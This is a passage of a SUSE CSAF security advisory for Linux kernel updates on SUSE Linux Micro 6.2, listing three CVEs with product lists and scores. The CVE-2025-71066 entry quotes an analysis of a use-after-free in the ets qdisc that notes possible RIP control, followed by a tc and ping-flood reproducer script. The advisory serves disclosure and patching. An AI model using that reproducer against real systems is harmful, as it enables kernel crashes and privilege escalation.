"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68821"
},
{
"cve": "CVE-2025-68822",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68822"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: alps - fix use-after-free bugs caused by dev3_register_work\n\nThe dev3_register_work delayed work item is initialized within\nalps_reconnect() and scheduled upon receipt of the first bare\nPS/2 packet from an external PS/2 device connected to the ALPS\ntouchpad. During device detachment, the original implementation\ncalls flush_workqueue() in psmouse_disconnect() to ensure\ncompletion of dev3_register_work. However, the flush_workqueue()\nin psmouse_disconnect() only blocks and waits for work items that\nwere already queued to the workqueue prior to its invocation. Any\nwork items submitted after flush_workqueue() is called are not\nincluded in the set of tasks that the flush operation awaits.\nThis means that after flush_workqueue() has finished executing,\nthe dev3_register_work could still be scheduled. Although the\npsmouse state is set to PSMOUSE_CMD_MODE in psmouse_disconnect(),\nthe scheduling of dev3_register_work remains unaffected.\n\nThe race condition can occur as follows:\n\nCPU 0 (cleanup path) | CPU 1 (delayed work)\npsmouse_disconnect() |\n psmouse_set_state() |\n flush_workqueue() | alps_report_bare_ps2_packet()\n alps_disconnect() | psmouse_queue_work()\n kfree(priv); // FREE | alps_register_bare_ps2_mouse()\n | priv = container_of(work...); // USE\n | priv-\u003edev3 // USE\n\nAdd disable_delayed_work_sync() in alps_disconnect() to ensure\nthat dev3_register_work is properly canceled and prevented from\nexecuting after the alps_data structure has been deallocated.\n\nThis bug is identified by static analysis.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68822",
"url": "https://www.suse.com/security/cve/CVE-2025-68822"
},
{
"category": "external",
"summary": "SUSE Bug 1256668 for CVE-2025-68822",
"url": "https://bugzilla.suse.com/1256668"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68822"
},
{
"cve": "CVE-2025-71064",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71064"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: using the num_tqps in the vf driver to apply for resources\n\nCurrently, hdev-\u003ehtqp is allocated using hdev-\u003enum_tqps, and kinfo-\u003etqp\nis allocated using kinfo-\u003enum_tqps. However, kinfo-\u003enum_tqps is set to\nmin(new_tqps, hdev-\u003enum_tqps); Therefore, kinfo-\u003enum_tqps may be smaller\nthan hdev-\u003enum_tqps, which causes some hdev-\u003ehtqp[i] to remain\nuninitialized in hclgevf_knic_setup().\n\nThus, this patch allocates hdev-\u003ehtqp and kinfo-\u003etqp using hdev-\u003enum_tqps,\nensuring that the lengths of hdev-\u003ehtqp and kinfo-\u003etqp are consistent\nand that all elements are properly initialized.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71064",
"url": "https://www.suse.com/security/cve/CVE-2025-71064"
},
{
"category": "external",
"summary": "SUSE Bug 1256654 for CVE-2025-71064",
"url": "https://bugzilla.suse.com/1256654"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71064"
},
{
"cve": "CVE-2025-71066",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71066"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n struct netlink_ext_ack *extack)\n{\n...\n\n // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n //to race with .dequeue handler (`ets_qdisc_dequeue`)\n sch_tree_lock(sch);\n\n for (i = nbands; i \u003c oldbands; i++) {\n if (i \u003e= q-\u003enstrict \u0026\u0026 q-\u003eclasses[i].qdisc-\u003eq.qlen)\n list_del_init(\u0026q-\u003eclasses[i].alist);\n qdisc_purge_queue(q-\u003eclasses[i].qdisc);\n }\n\n WRITE_ONCE(q-\u003enbands, nbands);\n for (i = nstrict; i \u003c q-\u003enstrict; i++) {\n if (q-\u003eclasses[i].qdisc-\u003eq.qlen) {\n\t\t // (2) the class is added to the q-\u003eactive\n list_add_tail(\u0026q-\u003eclasses[i].alist, \u0026q-\u003eactive);\n q-\u003eclasses[i].deficit = quanta[i];\n }\n }\n WRITE_ONCE(q-\u003enstrict, nstrict);\n memcpy(q-\u003eprio2band, priomap, sizeof(priomap));\n\n for (i = 0; i \u003c q-\u003enbands; i++)\n WRITE_ONCE(q-\u003eclasses[i].quantum, quanta[i]);\n\n for (i = oldbands; i \u003c q-\u003enbands; i++) {\n q-\u003eclasses[i].qdisc = queues[i];\n if (q-\u003eclasses[i].qdisc != \u0026noop_qdisc)\n qdisc_hash_add(q-\u003eclasses[i].qdisc, true);\n }\n\n // (3) the qdisc is unlocked, now dequeue can be called in parallel\n // to the rest of .change handler\n sch_tree_unlock(sch);\n\n ets_offload_change(sch);\n for (i = q-\u003enbands; i \u003c oldbands; i++) {\n\t // (4) we\u0027re reducing the refcount for our class\u0027s qdisc and\n\t // freeing it\n qdisc_put(q-\u003eclasses[i].qdisc);\n\t // (5) If we call .dequeue between (4) and (5), we will have\n\t // a strong UAF and we can control RIP\n q-\u003eclasses[i].qdisc = NULL;\n WRITE_ONCE(q-\u003eclasses[i].quantum, 0);\n q-\u003eclasses[i].deficit = 0;\n gnet_stats_basic_sync_init(\u0026q-\u003eclasses[i].bstats);\n memset(\u0026q-\u003eclasses[i].qstats, 0, sizeof(q-\u003eclasses[i].qstats));\n }\n return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\" # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n tc qdisc del dev \"$DEV\" root 2\u003e/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2\u003e/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n \u003e/dev/null 2\u003e\u00261 \u0026\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc del dev \"$DEV\" parent \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71066",
"url": "https://www.suse.com/security/cve/CVE-2025-71066"
},
{
"category": "external",
"summary": "SUSE Bug 1256645 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "external",
"summary": "SUSE Bug 1258005 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1258005"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
